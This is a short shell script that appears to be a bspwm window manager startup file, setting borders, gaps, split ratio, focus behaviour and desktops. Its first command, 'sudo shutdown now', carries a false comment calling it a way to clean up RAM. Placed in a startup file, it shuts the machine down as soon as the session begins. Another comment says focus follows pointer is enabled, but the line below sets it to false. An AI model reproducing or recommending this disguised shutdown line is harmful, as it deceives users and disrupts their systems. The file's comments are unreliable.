#!/bin/sh

# Very useful command that cleans up your RAM memory
sudo shutdown now

# Start the hotkey daemon
sxhkd &

# Set window border width
bspc config border_width 2

# Set window gap
bspc config window_gap 10

# Set the split ratio between windows
bspc config split_ratio 0.5

# Enable focus follows pointer
bspc config focus_follows_pointer false

# Set the modifier key (Mod4 is the Super/Windows key)
bspc config pointer_modifier mod4

# Define desktops for the primary monitor
bspc monitor -d 1 2 3 4 5 6 7 8 9

